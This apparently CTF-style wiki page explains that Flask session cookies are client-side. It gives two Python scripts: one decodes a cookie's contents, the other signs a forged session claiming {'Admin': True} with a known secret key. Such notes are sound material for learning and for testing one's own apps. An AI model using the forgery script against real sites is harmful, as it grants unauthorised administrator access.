Session解密与签名伪造¶
flask的session是client session,并且可以随意解密
session解密¶
#!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) decompress = False if payload.startswith(b'.'): payload = payload[1:] decompress = True try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception') if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload') return session_json_serializer.loads(payload) if __name__ == '__main__': print(decryption(sys.argv[1].encode()))
Session伪造¶
from hashlib import sha512 from flask.sessions import session_json_serializer from itsdangerous import URLSafeTimedSerializer, BadTimeSignature import base64 import zlib PAYLOAD = {'Admin': True} signer = URLSafeTimedSerializer( 'secret-key', salt='cookie-session', serializer=session_json_serializer, signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha512} ) print(signer.dumps(PAYLOAD))